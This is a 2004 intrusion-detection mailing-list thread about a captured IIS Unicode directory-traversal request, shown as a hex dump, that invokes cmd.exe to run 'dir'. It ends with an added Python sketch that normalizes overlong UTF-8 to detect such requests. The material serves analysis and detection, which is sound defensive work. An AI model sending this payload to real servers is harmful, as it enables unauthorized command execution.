[Snort-sigs] Weird new CMD.EXE payload...

Roach4 ml at ...2320...
Wed Jun 16 07:55:01 EDT 2004


Hi Jared,

This simply looks like an IIS exploit... either it's a scan or a specific
vulnerable string against your web server.

Good luck,

David



>
> I'm seeing a lot of this this morning. Weird patterns too.. One attempt from
> each source address. They keep pouring in ...
>
> Any thoughts??
>
> 000 : 67 65 74 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   get /scripts/..%
> 010 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25   c0%af..%c0%af..%
> 020 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25   c0%af..%c0%af..%
> 030 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25   c0%af..%c0%af..%
> 040 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2F 77 69   c0%af..%c0%af/wi
> 050 : 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64   nnt/system32/cmd
> 060 : 2E 65 78 65 3F 2F 63 25 32 30 64 69 72 0D 0A      .exe?/c%20dir..
>
>
> Jared Kalisz
> Prodika
> 1245 South Main Street, 2nd Floor
> Grapevine, Texas
> Tel 817.488.3080
> Fax 817.488.7060
>
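An added example, not part of the original thread: the request in the quoted dump contains no literal `../`, because `%c0%af` percent-decodes to the bytes C0 AF, an overlong two-byte UTF-8 encoding of `/`. The Python sketch below normalizes a request line before matching, using the bytes from the dump as input; the function names `fold_overlong` and `inspect_request` and the benign control request are assumptions made for illustration.

```python
from urllib.parse import unquote_to_bytes

# Request reassembled from the hex dump quoted in the post (111 bytes).
DUMPED = b"get /scripts/" + b"..%c0%af" * 8 + b"/winnt/system32/cmd.exe?/c%20dir\r\n"
# Constructed benign request, for contrast (not from the post).
BENIGN = b"GET /scripts/caf%c3%a9.asp?id=7 HTTP/1.0\r\n"


def fold_overlong(raw: bytes) -> bytes:
    """Map 2-byte overlong UTF-8 forms (lead byte C0/C1) to the ASCII byte they encode."""
    out, i = bytearray(), 0
    while i < len(raw):
        lead = raw[i]
        if lead in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(((lead & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(lead)
            i += 1
    return bytes(out)


def inspect_request(line: bytes) -> dict:
    """Normalize the request target, then report what a signature should match on."""
    _method, _, rest = line.strip().partition(b" ")
    target = rest.split(b" ")[0]
    path, _, query = target.partition(b"?")
    decoded = unquote_to_bytes(path)          # %c0%af -> b"\xc0\xaf"
    folded = fold_overlong(decoded)           # b"\xc0\xaf" -> b"/"
    norm = folded.replace(b"\\", b"/").lower()
    return {
        "raw_traversal": b"../" in path or b"..\\" in path,  # naive literal match
        "overlong_utf8": folded != decoded,
        "traversal": b"../" in norm,
        "cmd_exe": norm.endswith(b"/cmd.exe"),
        "path": norm.decode("latin-1"),
        "query": unquote_to_bytes(query).decode("latin-1"),
    }


if __name__ == "__main__":
    for req in (DUMPED, BENIGN):
        print(inspect_request(req))
```

For the dumped request the literal match misses while the normalized checks all fire; a legitimate two-byte UTF-8 character such as `%c3%a9` is left alone because its lead byte is not C0 or C1.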